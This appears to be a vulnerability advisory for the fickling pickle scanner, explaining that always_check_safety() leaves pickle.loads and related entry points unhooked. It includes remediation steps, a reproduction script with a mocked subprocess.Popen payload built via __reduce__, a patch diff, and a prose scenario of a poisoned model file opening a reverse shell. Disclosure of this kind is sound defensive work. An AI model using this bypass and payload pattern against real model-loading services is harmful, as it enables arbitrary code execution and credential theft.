If your ML pipeline uses fickling's always_check_safety() as a security control for model deserialization, it is broken — attackers can bypass it entirely by targeting pickle.loads or _pickle.loads entry points. Patch fickling to 0.1.9 immediately and treat any model loaded via fickling <= 0.1.8 as potentially compromised. Do not rely on fickling as a sole defense layer; add upstream model provenance controls.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | <= 0.1.8 | 0.1.9 |
Do you use fickling? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: Upgrade fickling to 0.1.9 immediately — pip install 'fickling>=0.1.9'. 2. VERIFY: Confirm patched version hooks pickle.loads and _pickle.loads by running fickling's regression test suite. 3. DEFENSE-IN-DEPTH: Do not rely solely on fickling; implement model provenance controls (cryptographic signatures, hashes, trusted registries). 4. SCAN HISTORY: Audit logs for model loads that occurred while fickling <= 0.1.8 was in use — treat any externally-sourced model as suspect. 5. DETECT: Alert on unexpected subprocess spawning or network calls during model load/deserialization operations. 6. BLOCK: Consider SafeTensors format as a pickle-free alternative for model serialization where possible.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
# Assessment The missing pickle entrypoints `pickle.loads`, `_pickle.loads`, and `_pickle.load` were added to the hook https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7. # Original report ## Summary `fickling.always_check_safety()` does not hook all pickle entry points. `pickle.loads`, `_pickle.loads`, and `_pickle.load` remain unprotected, enabling malicious payload execution despite global safety mode being enabled. ## Affected versions `<= 0.1.8` (verified on current upstream HEAD as of 2026-03-03) ## Non-duplication check against published Fickling GHSAs No published advisory covers hook-coverage bypass in `run_hook()`. Existing advisories are blocklist/detection bypasses (runpy, pty, cProfile, marshal/types, builtins, network constructors, OBJ visibility, etc.), not runtime hook coverage parity. ## Root cause `run_hook()` patches only: - `pickle.load` - `pickle.Unpickler` - `_pickle.Unpickler` It does not patch: - `pickle.loads` - `_pickle.load` - `_pickle.loads` ## Reproduction (clean upstream) ```python import io, pickle, _pickle from unittest.mock import patch import fickling from fickling.exception import UnsafeFileError class Payload: def __reduce__(self): import subprocess return (subprocess.Popen, (['echo','BYPASS'],)) data = pickle.dumps(Payload()) fickling.always_check_safety() # Bypass path with patch('subprocess.Popen') as popen_mock: pickle.loads(data) print('bypass sink called?', popen_mock.called) # True # Control path is blocked with patch('subprocess.Popen') as popen_mock: try: pickle.load(io.BytesIO(data)) except UnsafeFileError: pass print('blocked sink called?', popen_mock.called) # False ``` Observed on vulnerable code: - `pickle.loads` executes payload - `pickle.load` is blocked ## Minimal patch diff ```diff --- a/fickling/hook.py +++ b/fickling/hook.py @@ def run_hook(): - pickle.load = loader.load + pickle.load = loader.load + _pickle.load = loader.load + pickle.loads = loader.loads + _pickle.loads = loader.loads ``` ## Validation after patch - `pickle.loads`, `_pickle.loads`, and `_pickle.load` all raise `UnsafeFileError` - sink not called in any path Regression tests added locally: - `test_run_hook_blocks_pickle_loads` - `test_run_hook_blocks__pickle_load_and_loads` in `test/test_security_regressions_20260303.py` ## Impact High-confidence runtime protection bypass for applications that trust `always_check_safety()` as global guard.
Exploitation Scenario
An adversary targets an ML platform that validates user-submitted PyTorch models using fickling.always_check_safety() before serving them. The adversary crafts a malicious .pt file embedding a pickle payload with a __reduce__ method that spawns a reverse shell or exfiltrates credentials. Because the payload is designed to be loaded via pickle.loads (the standard PyTorch load path), fickling's patched pickle.load hook is never triggered. The model passes validation, is deployed to the inference cluster, and executes arbitrary code with the service account's privileges on first inference request. The attack requires no authentication beyond standard model submission access.